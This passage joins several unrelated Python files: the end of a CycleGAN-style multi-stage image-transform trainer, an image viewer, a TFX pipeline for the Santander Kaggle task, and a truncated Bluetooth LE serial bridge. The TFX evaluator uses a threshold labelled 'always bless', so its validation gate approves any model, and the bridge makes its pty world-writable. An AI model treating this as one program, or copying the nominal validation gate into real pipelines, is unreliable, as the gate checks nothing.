            b2a_sample_dis2 = models.discriminator(models.generator(b2a_sample, 'b2a', reuse=True), 'a', reuse=True)
            a2b2b = models.generator(a2b, 'a2b', reuse=True)
            a2b2b2a = models.generator(a2b2b, 'b2a', reuse=True)
            a2b2b2a2a = models.generator(a2b2b2a, 'b2a', reuse=True)
            b2a2a = models.generator(b2a, 'b2a', reuse=True)
            b2a2a2b = models.generator(b2a2a, 'a2b', reuse=True)
            b2a2a2b2b = models.generator(b2a2a2b, 'a2b', reuse=True)
            cyc_loss_a2 = tf.identity(ops.l1_loss(a_real, a2b2b2a2a) * 10.0, name='cyc_loss_a2')
            cyc_loss_b2 = tf.identity(ops.l1_loss(b_real, b2a2a2b2b) * 10.0, name='cyc_loss_b2')
            double_cycle_loss = cyc_loss_a2 + cyc_loss_b2

        # Losses: adversarial (LSGAN-style l2 towards ones) + cycle consistency (l1 * 10).
        g_loss_a2b = tf.identity(ops.l2_loss(a2b_dis, tf.ones_like(a2b_dis)), name='g_loss_a2b')
        g_loss_b2a = tf.identity(ops.l2_loss(b2a_dis, tf.ones_like(b2a_dis)), name='g_loss_b2a')
        cyc_loss_a = tf.identity(ops.l1_loss(a_real, a2b2a) * 10.0, name='cyc_loss_a')
        cyc_loss_b = tf.identity(ops.l1_loss(b_real, b2a2b) * 10.0, name='cyc_loss_b')
        g_loss = g_loss_a2b + g_loss_b2a + cyc_loss_a + cyc_loss_b + double_cycle_loss

        d_loss_b2a_sample2 = d_loss_a2b_sample2 = 0.0
        d_loss_a_real = ops.l2_loss(a_dis, tf.ones_like(a_dis))
        d_loss_a_from_b_real = tf.identity(ops.l2_loss(a_from_b_dis, tf.zeros_like(a_from_b_dis)), name='d_loss_a_from_b') #mod1
        d_loss_b2a_sample = ops.l2_loss(b2a_sample_dis, tf.zeros_like(b2a_sample_dis))
        if args.double_cycle:
            # NOTE(review): the zeros target is shaped from b2a_sample_dis, not
            # b2a_sample_dis2 — presumably the same shape; confirm intended.
            d_loss_b2a_sample2 = ops.l2_loss(b2a_sample_dis2, tf.zeros_like(b2a_sample_dis))
        # NOTE(review): with double_cycle enabled this sums four terms but still
        # divides by 3.0 — confirm the intended weighting.
        d_loss_a = tf.identity((d_loss_a_real + d_loss_b2a_sample + d_loss_b2a_sample2 + d_loss_a_from_b_real) / 3.0, name='d_loss_a')

        d_loss_b_real = ops.l2_loss(b_dis, tf.ones_like(b_dis))
        d_loss_b_from_a_real = tf.identity(ops.l2_loss(b_from_a_dis, tf.zeros_like(b_from_a_dis)), name='d_loss_b_from_a') #mod1
        d_loss_a2b_sample = ops.l2_loss(a2b_sample_dis, tf.zeros_like(a2b_sample_dis))
        if args.double_cycle:
            d_loss_a2b_sample2 = ops.l2_loss(a2b_sample_dis2, tf.zeros_like(a2b_sample_dis))
        d_loss_b = tf.identity((d_loss_b_real + d_loss_a2b_sample + d_loss_a2b_sample2 + d_loss_b_from_a_real) / 3.0, name='d_loss_b')

        # Summaries
        g_summary = ops.summary_tensors([g_loss_a2b, g_loss_b2a, cyc_loss_a, cyc_loss_b])
        d_summary_a = ops.summary_tensors([d_loss_a, d_loss_a_from_b_real])
        d_summary_b = ops.summary_tensors([d_loss_b, d_loss_b_from_a_real])

        # Optim: separate Adam optimizers for each discriminator and the generators.
        t_var = tf.trainable_variables()
        d_a_var = [var for var in t_var if 'a_discriminator' in var.name]
        d_b_var = [var for var in t_var if 'b_discriminator' in var.name]
        g_var = [var for var in t_var if 'a2b_generator' in var.name or 'b2a_generator' in var.name]

        d_a_train_op = tf.train.AdamOptimizer(args.lr, beta1=0.5).minimize(d_loss_a, var_list=d_a_var)
        d_b_train_op = tf.train.AdamOptimizer(args.lr, beta1=0.5).minimize(d_loss_b, var_list=d_b_var)
        g_train_op = tf.train.AdamOptimizer(args.lr, beta1=0.5).minimize(g_loss, var_list=g_var)

    return g_train_op, d_a_train_op, d_b_train_op, g_summary, d_summary_a, d_summary_b, a2b, a2b2a, b2a, b2a2b, a_real, b_real, a2b_sample, b2a_sample, a2b1, b2a1
def get_args():
    """Parse and validate command line arguments.

    Also normalizes the stage naming: if no stage3 is given, the pair
    (stage1, stage2) is shifted into (stage2, stage3) so the rest of the
    script can always treat stage2->stage3 as the active transformation.
    """
    parser = argparse.ArgumentParser(description='')
    # NOTE(review): help text says "trainABC, trainDEF, trainABC and testDEF" —
    # the third item is presumably meant to be "testABC".
    parser.add_argument('--dataset', dest='dataset', required=True, help='Dataset directory that contains the trainABC, trainDEF, trainABC and testDEF directories, where ABC and DEF stand for the stage1 and stage2 arguments')
    parser.add_argument('--checkpointroot', dest='checkpointroot', default='./checkpoints', help='Directory for storing checkpoints')
    parser.add_argument('--prev_checkpoint', dest='prev_checkpoint', default=None, help='Use the specific checkpoint of the form "Epoch_(256)_(1828of2337)_step_(600099)" (no ckpt).')
    parser.add_argument('--load_size', dest='load_size', type=int, default=256, help='scale images to this size')
    parser.add_argument('--crop_size', dest='crop_size', type=int, default=256, help='then crop to this size')
    parser.add_argument('--max_epochs', dest='epoch', type=int, default=200, help='# of epochs to run')
    parser.add_argument('--max_steps', dest='max_steps', type=int, default=1e9, help='# of max training steps to take')
    parser.add_argument('--batch_size', dest='batch_size', type=int, default=1, help='# images in a batch')
    parser.add_argument('--lr', dest='lr', type=float, default=0.0002, help='initial learning rate for adam')
    parser.add_argument('--gpu_id', dest='gpu_id', type=int, default=0, help='GPU ID')
    parser.add_argument('--stage1', dest='stage1', required=True, help='[dataset]/[train|test][stage-name] for stage #1, e.g. "_age_35" if your dataset is "celeb" and data is under celeb/train_age35')
    parser.add_argument('--stage2', dest='stage2', required=True, help='[dataset]/[train|test][stage-name] for stage #2')
    parser.add_argument('--stage3', dest='stage3', default=None, help='[dataset]/[train|test][stage-name] for stage #3')
    parser.add_argument('--subnet', dest='subnet', default='', help='Sub-network to use for this transformer, with separate checkpoints')
    # The special modes:
    parser.add_argument('--double_cycle', dest='double_cycle', action='store_true', default='', help='Constraint to ensure that if you run a transformer twice in succession, and then twice in reverse, you get back the original.')
    parser.add_argument('--triplet', dest='triplet', default='', action='store_true', help='Run the transitive transformation on both the previous and current dataset.')
    parser.add_argument('--transform_twice', dest='transform_twice', action='store_true', default='', help='Run the transitive transformation twice on the source data set. Maintain consistency.')
    # Tests:
    parser.add_argument('--chaintestdir', dest='chaintestdir', default=None, help='Show single and double transformations for images in the given directory. Use the latest triplet weights (must exist).')
    parser.add_argument('--singletestN', dest='singletestN', type=int, default=0, help='Show the given number of single transformations.')
    parser.add_argument('--singletestdir', dest='singletestdir', default="", help='Input dir for the single transformation test.')
    parser.add_argument('--singletestdir_out', dest='singletestdir_out', default="", help='Output dir for the single transformation test.')
    parser.add_argument('--singletest_forward', dest='singletest_forward', type=int, default=1, help='Map the images to forward/backward direction (0 = backward, 1 = forward)')
    parser.add_argument('--samplingcycle', dest='samplingcycle', type=int, default=0, help='How often to generate a transformed sample batch from TEST set, e.g. for age estimation.')
    parser.add_argument('--online_sampling_batch_size', dest='online_sampling_batch_size', type=int, default=50, help="Number of samples for the auxiliary samples")
    parser.add_argument('--save', dest='do_save', type=int, required=True, help='Save weights after training (0/1)')
    args = parser.parse_args()
    # Triplet mode needs an explicit stage3.
    assert((not args.triplet) or args.stage3)
    # In terms of actual variable naming, we assume the triplet mode is the standard - so that if we do not use triplets, we start from stage #2
    if not args.stage3:
        args.stage3 = args.stage2
        args.stage2 = args.stage1
    assert(args.stage2 != args.stage3)
    return args
# Input args handling
args = get_args()
print(args)

# Derived mode flags: train unless a test mode was requested.
do_train = (args.chaintestdir == None and args.singletestN <= 0)
print("Will train: " + str(do_train))
do_save = (args.do_save==1)
print("Will save weights after training: " + str(do_save))
singleTestOnly = len(args.singletestdir) > 0
if args.triplet:
    print("Triplet enabled. You intend to apply a network trained on {}->{} on data {} while maintaining compatibility with the previous transform.".format(args.stage1, args.stage2, args.stage3))

# Network building
g_train_op, d_a_train_op, d_b_train_op, g_summary, d_summary_a, d_summary_b, a2b, a2b2a, b2a, b2a2b, a_real, b_real, a2b_sample, b2a_sample, a2b1, b2a1 = build_networks()

# Session management
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
it_cnt, update_cnt = ops.counter()
if do_train:
    summary_writer = tf.summary.FileWriter('./summaries/' + args.dataset+ '/train-'+training_run_id(), sess.graph)

# Data loading
if not singleTestOnly:
    a_data_pool, b_data_pool, c_data_pool, a_test_pool, b_test_pool, c_test_pool = load_data(args)
else:
    single_test_input_pool = data.ImageData(sess, glob(args.singletestdir+'/*.png'), 1, load_size=args.load_size, crop_size=args.crop_size, shuffle = False, random_flip = True) #Fix the random flip problem, see data.py, then make the flip False.

# Replay pools for previously generated samples (discriminator training).
b2c_pool = utils.ItemPool()
c2b_pool = utils.ItemPool()
a2b_pool = utils.ItemPool()
b2a_pool = utils.ItemPool()

# Checkpoint management.
saver = tf.train.Saver(max_to_keep=5)

# If the triplet mode is enabled, we try to load the existing checkpoint for that first.
# Otherwise, we try to load the regular checkpoint only.
subnet_maybe = ('/'+args.subnet) if len(args.subnet) > 0 else ''
subnet_ext_maybe = (subnet_maybe + ('-transitive2')) if args.transform_twice else subnet_maybe
ckpt_dir_normal = args.checkpointroot + '/' + args.dataset + subnet_maybe
ckpt_dir_ext = args.checkpointroot + '/' + args.dataset + subnet_ext_maybe
online_samples_dir = './sample_images_while_training/' + args.dataset + subnet_ext_maybe
utils.mkdir(online_samples_dir + '/')
ckpt_path = None
ckpt_dir = None
#TODO: The prev_checkpoint does not support the transform_twice directories yet
if (not do_train or not do_save) and args.prev_checkpoint:
    # Restore one precisely named checkpoint (test / no-save runs).
    prev_ckpt = args.prev_checkpoint+".ckpt"
    print("Loading precise checkpoint {}/{}".format(ckpt_dir_normal, prev_ckpt))
    saver.restore(sess, os.path.join(ckpt_dir_normal, prev_ckpt))
else:
    utils.mkdir(ckpt_dir_normal + '/')
    if args.transform_twice:
        print("Transform-twice mode weight loading attempting...")
        utils.mkdir(ckpt_dir_ext + '/')
        ckpt_dir = ckpt_dir_ext
        ckpt_path = utils.load_checkpoint(ckpt_dir, sess, saver)
    else:
        print("No Transform-twice mode weight loading attempted.")
    if ckpt_path is None:
        # Fall back to the regular (non-transitive) checkpoint directory.
        print("No Transform-twice mode weight loading done. Attempting regular weight loading...")
        ckpt_dir = ckpt_dir_normal
        ckpt_path = utils.load_checkpoint(ckpt_dir, sess, saver)
    if ckpt_path is None:
        print("No checkpoints found for loading.")
        if args.transform_twice or args.triplet:
            print("You requested a re-use mode but there were no existing weights of a subnet. Did you specify an existing subnet?")
            # NOTE: requires `import sys` at the top of the file.
            sys.exit()
        sess.run(tf.global_variables_initializer())
        print("In the future, using checkpoint directory {}".format(ckpt_dir_normal))
    else:
        print('Loading checkpoint from Copy variables from % s' % ckpt_path)
        if args.transform_twice:
            ckpt_dir = ckpt_dir_ext
print("Saving checkpoints of this session under {}".format(ckpt_dir))
# Train / test. Runs the training loop, or one of the test modes, then always
# stops the queue-runner threads and closes the session.
try:
    tf_coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(sess=sess, coord=tf_coord)
    epoch = args.epoch
    if do_train:
        if not args.triplet:
            batch_epoch = len(b_data_pool) // args.batch_size
        else:
            batch_epoch = min(len(a_data_pool), len(b_data_pool)) // args.batch_size
        max_it = min(epoch * batch_epoch, args.max_steps)
        last_it = -1
        for it in range(sess.run(it_cnt), max_it):
            sess.run(update_cnt)
            last_it = it
            # prepare data: always train on the (b, c) stage pair; in triplet
            # mode additionally train on (a, b) in the same iteration.
            b_real_ipt_orig = b_data_pool.batch()
            c_real_ipt_orig = c_data_pool.batch()
            matching_domain_sample_pairs = [(b_real_ipt_orig, c_real_ipt_orig)]
            if args.triplet:
                a_real_ipt_orig = a_data_pool.batch()
                matching_domain_sample_pairs += [(a_real_ipt_orig, b_real_ipt_orig)]
            for a_real_ipt, b_real_ipt in matching_domain_sample_pairs:
                a2b_opt, b2a_opt = sess.run([a2b, b2a], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
                a2b_sample_ipt = np.array(a2b_pool(list(a2b_opt)))
                b2a_sample_ipt = np.array(b2a_pool(list(b2a_opt)))
                # train G
                g_summary_opt, _ = sess.run([g_summary, g_train_op], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
                summary_writer.add_summary(g_summary_opt, it)
                # train D_b
                d_summary_b_opt, _ = sess.run([d_summary_b, d_b_train_op], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt, a2b_sample: a2b_sample_ipt})
                summary_writer.add_summary(d_summary_b_opt, it)
                # train D_a
                d_summary_a_opt, _ = sess.run([d_summary_a, d_a_train_op], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt, b2a_sample: b2a_sample_ipt})
                summary_writer.add_summary(d_summary_a_opt, it)
            epoch = it // batch_epoch
            it_epoch = it % batch_epoch + 1
            # display
            print("Epoch: (%3d) (%5d/%5d) %s" % (epoch, it_epoch, batch_epoch, '(a->b->c)' if args.triplet else ''))
            # Checkpointing
            if do_save and (it + 1) % 10000 == 0:
                save_path = saver.save(sess, '%s/Epoch_(%d)_(%dof%d)_step_(%d).ckpt' % (ckpt_dir, epoch, it_epoch, batch_epoch,it))
                print('Model saved in file: % s' % save_path)
            # Sample images for external evaluation (i.e. just raw single images). Note: For triplet=true, there are 2x steps involved.
            if args.samplingcycle > 0 and (it % args.samplingcycle == 0) and it > 0:
                print("Create samples for the external evaluator (aux batch {} with size {})".format(int(it/args.samplingcycle), args.online_sampling_batch_size))
                for c_i in range(args.online_sampling_batch_size):
                    fname = 'Transformed_from_%s_(%dof%d)_once.png' % (args.stage2, c_i, args.singletestN)
                    save_single_img(a_real_ipt = b_test_pool.batch(), b_real_ipt = c_test_pool.batch(), save_dir = './aux_samples/' + args.dataset + subnet_ext_maybe+'/'+args.stage2+'/'+str(int(it)), fname=fname)
            # Create sample images with a-b-a structure
            if (it + 1) % 100 == 0:
                a_real_ipt = b_test_pool.batch()
                b_real_ipt = c_test_pool.batch()
                [a2b_opt, a2b2a_opt, b2a_opt, b2a2b_opt] = sess.run([a2b, a2b2a, b2a, b2a2b], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
                sample_opt = np.concatenate((a_real_ipt, a2b_opt, a2b2a_opt, b_real_ipt, b2a_opt, b2a2b_opt), axis=0)
                im.imwrite(im.immerge(sample_opt, 2, 3), '%s/Epoch_(%d)_(%dof%d).png' % (online_samples_dir, epoch, it_epoch, batch_epoch))
                if args.double_cycle:
                    # Feed the generated samples back in to visualize the double cycle.
                    [a2b_opt, a2b2a_opt, b2a_opt, b2a2b_opt] = sess.run([a2b, a2b2a, b2a, b2a2b], feed_dict={a_real: a2b_opt, b_real: b2a_opt})
                    sample_opt = np.concatenate((a_real_ipt, a2b_opt, a2b2a_opt, b_real_ipt, b2a_opt, b2a2b_opt), axis=0)
                    im.imwrite(im.immerge(sample_opt, 2, 3), '%s/Epoch_(%d)_(%dof%d)_double_cycle.png' % (online_samples_dir, epoch, it_epoch, batch_epoch))
        if do_save and last_it != -1:
            save_path = saver.save(sess, '%s/Epoch_(%d)_(%dof%d)_step_(%d).ckpt' % (ckpt_dir, epoch, it_epoch, batch_epoch,last_it))
            print('Final model saved in file: % s' % save_path)
    elif args.chaintestdir:
        # Chain test: show once- and twice-transformed versions of test images.
        chaintests_N = 20
        print("Run chain test on dir {} for {} times".format(args.chaintestdir, chaintests_N))
        for c_i in range(chaintests_N):
            a_real_ipt = b_test_pool.batch()
            b_real_ipt = c_test_pool.batch()
            [a2b_opt, a2b1_opt] = sess.run([a2b, a2b1], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
            sample_opt = np.concatenate((a_real_ipt, a2b1_opt, a2b_opt), axis=0)
            im.imwrite(im.immerge(sample_opt, 1, 3), '%s/Epoch_(%d)_(%dof%d)_once_and_twice.png' % (online_samples_dir, epoch, c_i, chaintests_N))
    elif singleTestOnly:
        print("Run single imgs test for {} times in direction {}".format(args.singletestN, "FORWARD" if args.singletest_forward==1 else "REVERSE"))
        for c_i in range(args.singletestN):
            fname = 'Transformed_from_%s_(%dof%d)_once.png' % (args.stage2, c_i, args.singletestN)
            test_batch = single_test_input_pool.batch()
            # FIX: was `not args.singletestdir_out == None`, which is always true
            # because the argparse default is "" — an empty output dir then produced
            # paths like "/<fname>". Fall back to the online samples dir instead.
            _save_dir = args.singletestdir_out if args.singletestdir_out else online_samples_dir + '/s'
            save_single_img(a_real_ipt = test_batch, b_real_ipt = test_batch, save_dir = _save_dir, fname=fname, forward_mapping = (args.singletest_forward == 1))
except Exception as e:
    # FIX: `except Exception, e:` is Python-2-only syntax and fails to parse
    # under Python 3; `as e` is valid on Python 2.6+ and 3.
    tf_coord.request_stop(e)
    print(e)
finally:
    print("Stop threads and close session!")
    tf_coord.request_stop()
    tf_coord.join(threads)
    sess.close()
|
""" One by one show real images in the CelebA-HQ npy files' directory
Very useful for analyzing the data. press Q to move to the next image """
import argparse
import os
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
def _parse_bool(value):
    """Parse a command-line string into a real boolean.

    argparse's ``type=bool`` is a classic trap: ``bool("False")`` is True
    because any non-empty string is truthy. This helper interprets the
    usual true/false spellings explicitly.
    """
    if isinstance(value, bool):
        return value
    lowered = value.lower()
    if lowered in ("true", "1", "yes", "y"):
        return True
    if lowered in ("false", "0", "no", "n"):
        return False
    raise argparse.ArgumentTypeError("expected a boolean, got %r" % value)


def parse_arguments(argv=None):
    """
    default command line argument parser
    :param argv: optional argument list (defaults to sys.argv); allows the
                 parser to be exercised programmatically
    :return: args => parsed command line arguments
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--images_path", action="store", type=str,
                        help="path to the directory containing the images",
                        default="./", required=True)
    # BUG FIX: was type=bool, which turned every non-empty value
    # (including "False") into True.
    parser.add_argument("--npz_files", action="store", type=_parse_bool,
                        default=True,
                        help="Whether it contains npz files or not", required=True)
    args = parser.parse_args(argv)
    return args
def main(args):
    """
    Display every image in the directory, one at a time.

    :param args: parsed command line arguments (images_path, npz_files)
    :return: None
    """
    # Walk the directory in os.listdir order; each file is shown in its own
    # maximized window and the loop advances when the window is closed.
    for file_name in os.listdir(args.images_path):
        full_path = os.path.join(args.images_path, file_name)
        if args.npz_files:
            # assumes the stored array is (1, C, H, W) — TODO confirm;
            # squeeze + transpose yields (H, W, C) for imshow.
            img = np.load(full_path)
            img = img.squeeze(0).transpose(1, 2, 0)
        else:
            img = np.array(Image.open(full_path))
        # show the image on screen:
        fig = plt.figure()
        fig.suptitle(file_name)
        plt.imshow(img)
        manager = plt.get_current_fig_manager()
        manager.resize(*manager.window.maxsize())
        plt.show()
if __name__ == '__main__':
    # Entry point: parse CLI arguments and display each image in turn.
    main(parse_arguments())
|
"""
TFX Beam implementation to make a pipeline for solving santander problem.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import os
import tensorflow as tf
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen, StatisticsGen, SchemaGen, Trainer, ResolverNode, Evaluator, Pusher
from tfx.components.base import executor_spec
from tfx.components.trainer.executor import GenericExecutor
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.utils.dsl_utils import external_input
from tfx.orchestration import pipeline
from tfx.orchestration import metadata
from tfx.orchestration.beam.beam_dag_runner import BeamDagRunner
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.types import Channel
from tfx.types.standard_artifacts import Model
from tfx.types.standard_artifacts import ModelBlessing
FLAGS = flags.FLAGS
def generate_pipeline(pipeline_name, pipeline_root, data_root, train_steps, eval_steps, pusher_target):
    """Assemble the TFX pipeline for the Santander problem.

    :param pipeline_name: identifier used to distinguish pipelines
    :param pipeline_root: directory where pipeline artifacts are stored
    :param data_root: folder containing the Kaggle train.csv
    :param train_steps: number of training steps
    :param eval_steps: number of evaluation steps
    :param pusher_target: directory the blessed model is pushed to
    :return: a pipeline.Pipeline ready to hand to a runner
    """
    # CSV ingestion -> statistics -> schema inference.
    examples = external_input(data_root)
    example_gen = CsvExampleGen(input=examples)
    statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
    schema_gen = SchemaGen(statistics=statistics_gen.outputs['statistics'],
                           infer_feature_shape=False)
    # GenericExecutor runs the Keras run_fn from the module file.
    # NOTE(review): assumes util.py (next to this script) defines the
    # trainer entry point expected by GenericExecutor — confirm.
    trainer = Trainer(
        custom_executor_spec=executor_spec.ExecutorClassSpec(GenericExecutor),
        examples=example_gen.outputs['examples'],
        schema=schema_gen.outputs['schema'],
        module_file='util.py',  # util.py is a file in the same folder
        train_args=trainer_pb2.TrainArgs(num_steps=train_steps),
        eval_args=trainer_pb2.EvalArgs(num_steps=eval_steps))
    # Get the latest blessed model for model validation.
    model_resolver = ResolverNode(
        instance_name='latest_blessed_model_resolver',
        resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
        model=Channel(type=Model),
        model_blessing=Channel(type=ModelBlessing))
    # Uses TFMA to compute a evaluation statistics over features of a model and
    # perform quality validation of a candidate model (compared to a baseline).
    # The 0.4 lower bound is deliberately lax so the model is always blessed.
    eval_config = tfma.EvalConfig(
        model_specs=[tfma.ModelSpec(label_key='target')],
        slicing_specs=[tfma.SlicingSpec()],
        metrics_specs=[
            tfma.MetricsSpec(
                thresholds={
                    'binary_accuracy':
                        tfma.config.MetricThreshold(
                            value_threshold=tfma.GenericValueThreshold(
                                lower_bound={'value': 0.4}))  # always bless
                })
        ])
    evaluator = Evaluator(
        examples=example_gen.outputs['examples'],
        model=trainer.outputs['model'],
        # baseline_model=model_resolver.outputs['model'],
        # Change threshold will be ignored if there is no baseline (first run).
        eval_config=eval_config)
    # Checks whether the model passed the validation steps and pushes the model
    # to a file destination if check passed.
    pusher = Pusher(
        model=trainer.outputs['model'],
        model_blessing=evaluator.outputs['blessing'],
        push_destination=pusher_pb2.PushDestination(
            filesystem=pusher_pb2.PushDestination.Filesystem(
                base_directory=pusher_target)))
    # ML Metadata is kept in a local SQLite file under the pipeline root.
    return pipeline.Pipeline(
        pipeline_name=pipeline_name,
        pipeline_root=pipeline_root,
        components=[
            example_gen, statistics_gen, schema_gen, trainer,
            model_resolver, evaluator, pusher,
        ],
        enable_cache=True,
        metadata_connection_config=metadata.sqlite_metadata_connection_config(
            os.path.join(pipeline_root, 'metadata.sqlite')))
def main(_):
    """Build the pipeline from CLI flags and execute it with Beam."""
    # Local name chosen so it does not shadow the imported `pipeline` module.
    beam_pipeline = generate_pipeline(
        flags.FLAGS.pipeline_name,
        flags.FLAGS.pipeline_root,
        flags.FLAGS.data_root,
        flags.FLAGS.train_steps,
        flags.FLAGS.eval_steps,
        flags.FLAGS.pusher_target)
    BeamDagRunner().run(beam_pipeline)
if __name__ == '__main__':
    # Flags are registered here so importing this module for its pipeline
    # factory does not define CLI flags.
    flags.DEFINE_string(
        # BUG FIX: help text said "identity" instead of "identify".
        name="pipeline_name", default="santander",
        help="pipeline name used to identify different pipelines")
    flags.DEFINE_string(
        name="pipeline_root", default="/var/tmp/santander/keras/",
        help="pipeline root for storing artifacts")
    flags.DEFINE_string(
        name="data_root", default="/var/tmp/santander/data/train",
        help="Folder for Kaggle train.csv. No test.csv in the folder.")
    flags.DEFINE_integer(
        name="train_steps", default=10000,
        help="Steps to train a model")
    flags.DEFINE_integer(
        name="eval_steps", default=1000,
        # BUG FIX: help text was copy-pasted from train_steps.
        help="Steps to evaluate a model")
    app.run(main)
#!/usr/bin/env python
"""
blepty.py connects to a JNHuaMao Bluetooth Low Energy module and
creates a pseudo-terminal (pty) that can be opened like a serial
port. The program writes the path to the terminal program and then
runs in the background, passing data between the BLE module and
the PTY.
This program must be run as root because it seems Python programs
cannot have capabilities assigned to them. If they could, then
sudo setcap 'cap_net_raw,cap_net_admin+eip' blepty.py
would allow this program to run without root privileges.
The work-around is to use cython to compile the program into a
standalone executable.
$ cython --embed blepty.py
$ make blepty CFLAGS="-I/usr/include/python2.7" LDFLAGS="-lpython2.7"
$ sudo setcap 'cap_net_raw,cap_net_admin+eip' blepty
Prerequisites:
1. A Bluetooth LE adapter on the host computer.
2. A Bluetooth LE device using a JNHuaMao BLE modules.
3. A supported OS on the host computer (Linux, OSX)
4. The necessary Python Bluetooth and GATT support libraries.
"""
from __future__ import print_function
from bluetooth.ble import DiscoveryService
from bluetooth.ble import GATTRequester, GATTResponse
import argparse
import logging
import binascii
import sys
import os
import pty
import tty
import termios
import fcntl
import select
from time import sleep
from cStringIO import StringIO
# GATT service and characteristic UUIDs of the BLE TNC (JNHuaMao module).
# RX carries data from the device to us; TX carries data we send to it.
BLETNC_SERVICE_UUID = '424a0001-90d6-4c48-b2aa-ab415169c333'
BLETNC_RX_CHAR_UUID = '424a0002-90d6-4c48-b2aa-ab415169c333'
BLETNC_TX_CHAR_UUID = '424a0003-90d6-4c48-b2aa-ab415169c333'
class NotifyTNC(GATTResponse):
    """
    Notifications are received here and printed to STDOUT.
    """
    def pty(self, fd):
        # Store the master PTY fd. NOTE(review): on_response below does not
        # currently write to it; the fd appears kept for future use.
        self.fd = fd
    def on_response(self, data):
        # Dump the raw response payload as hex for debugging.
        print("NotifyTNC data: {}".format(binascii.hexlify(data)))
class TNCRequester(GATTRequester):
    """
    The requester connected to the specific GATT characteristic.

    Forwards BLE notifications to the master end of the PTY (fd) so the
    slave end behaves like a serial port for terminal programs.
    """
    def __init__(self, address, fd):
        # fd is the master PTY descriptor; on_notification() writes to it.
        self.fd = fd
        GATTRequester.__init__(self, address, False)
        self.response = NotifyTNC()
        self.response.pty(fd)
        # Order matters: connect before characteristic discovery.
        # channel_type 'random' / 'medium' security match the JNHuaMao module.
        self.connect(True, channel_type = 'random', security_level = 'medium')
        self.handle = self.find_characteristic()
        print("Reading from handle {}".format(self.handle))
        self.read_by_handle_async(self.handle, self.response)
    def find_characteristic(self):
        # Find the UART characteristic and store its handle.
        chars = self.discover_characteristics()
        handle = [x['value_handle'] for x in chars
                  if x['uuid'] == BLETNC_RX_CHAR_UUID]
        if len(handle) == 0:
            raise RuntimeError("UART Characteristic not found.")
        return handle[0]
    def get_handle(self): return self.handle
    def on_notification(self, handle, data):
        # Only data[3:] is forwarded — presumably the first 3 bytes are the
        # ATT notification header (opcode + handle); confirm against stack docs.
        print("TNCRequester data[{:2d}]: {}".format(len(data[3:]), binascii.hexlify(data[0:])))
        os.write(self.fd, data[3:])
    def __del__(self):
        self.disconnect()
class Master(object):
    """Owns the PTY pair and shuttles bytes between the PTY and the BLE link."""

    def __init__(self, address):
        """Open a PTY, start the BLE requester, and configure the slave end
        to emulate a raw serial port.

        :param address: MAC address of the BLE device to connect to
        """
        # Open PTY
        self.master, self.slave = pty.openpty()
        # Start requester (it writes incoming BLE data to the master fd).
        self.requester = TNCRequester(address, self.master)
        self.handle = self.requester.get_handle()
        # Configure slave PTY for Serial port emulation.
        tty.setraw(self.slave)
        attr = termios.tcgetattr(self.slave)
        attr[3] = attr[3] & ~termios.ECHO
        termios.tcsetattr(self.slave, termios.TCSADRAIN, attr)
        # PTY needs to be accessible to normal users when running as root.
        # 0o666 spelling is valid on Python 2.6+ and Python 3 (bare 0666
        # is a syntax error on Python 3).
        os.fchmod(self.slave, 0o666)
        print("Listening on {}".format(os.ttyname(self.slave)))

    def run(self):
        """Read from the master endpoint of the PTY. Use poll() to
        wait for data. Data that is received is sent in no more
        than 20-byte chunks. If less than 20 bytes are read, the
        read times out after 10ms and sends the data that has
        been read."""
        # Set up the poll object.
        # BUG FIX: non-blocking mode is a *file status* flag, manipulated with
        # F_GETFL/F_SETFL. The original used F_GETFD/F_SETFD, which handle
        # file *descriptor* flags (close-on-exec), so O_NONBLOCK was never
        # actually applied to the fd.
        flag = fcntl.fcntl(self.master, fcntl.F_GETFL)
        fcntl.fcntl(self.master, fcntl.F_SETFL, flag | os.O_NONBLOCK)
        p = select.poll()
        p.register(self.master, select.POLLIN)
        pos = 0
        while True:
            if pos == 0:
                # Create a new buffer and wait for data. This can
                # only wait a few seconds in order to check for
                # BLE disconnection.
                block = StringIO()
                poll_results = p.poll(3000)
            else:
                # We read less than 20 bytes. Time out in 10ms to
                # send a short packet.
                poll_results = p.poll(10)
            if len(poll_results) == 0:
                # Poll timeout -- must be a short packet.
                if not self.requester.is_connected():
                    print("Disconnected")
                    break
                if pos == 0: continue  # nothing to send
                print("write[{:2d}]: {}".format(len(block.getvalue()),
                                                binascii.hexlify(block.getvalue())))
                # NOTE(review): this path wraps the payload in
                # str(bytearray(...)) while the 20-byte path below sends the
                # buffer directly — presumably equivalent on Python 2; confirm.
                self.requester.write_by_handle_async(self.handle,
                                                     str(bytearray(block.getvalue())),
                                                     self.requester.response)
                pos = 0
            else:
                # Read one byte at a time. This is to ensure that
                # we do not block in the read.
                c = os.read(self.master, 1)
                block.write(c)
                pos += len(c)
                # 20 bytes presumably matches the BLE ATT write payload
                # limit for this module — confirm.
                if pos == 20:
                    print("write[{:2d}]: {}".format(len(block.getvalue()), binascii.hexlify(block.getvalue())))
                    self.requester.write_by_handle_async(self.handle, block.getvalue(), self.requester.response)
                    pos = 0
        print("Done.")
        sys.exit(0)
def parse_args(argv=None):
    """Parse command-line options.

    :param argv: optional list of arguments (defaults to sys.argv); allows
                 the parser to be exercised programmatically
    :return: the parsed argparse Namespace
    """
    parser = argparse.ArgumentParser(description='BLE UART server.')
    parser.add_argument('-m', '--mac',
                        help='the MAC address of the Bluetooth LE device')
    parser.add_argument('-n', '--name',
                        help='the name of the Bluetooth LE device')
    parser.add_argument('-l', '--list', action='store_true',
                        help='list the discoverable Bluetooth LE devices')
    return parser.parse_args(argv)
def get_devices():
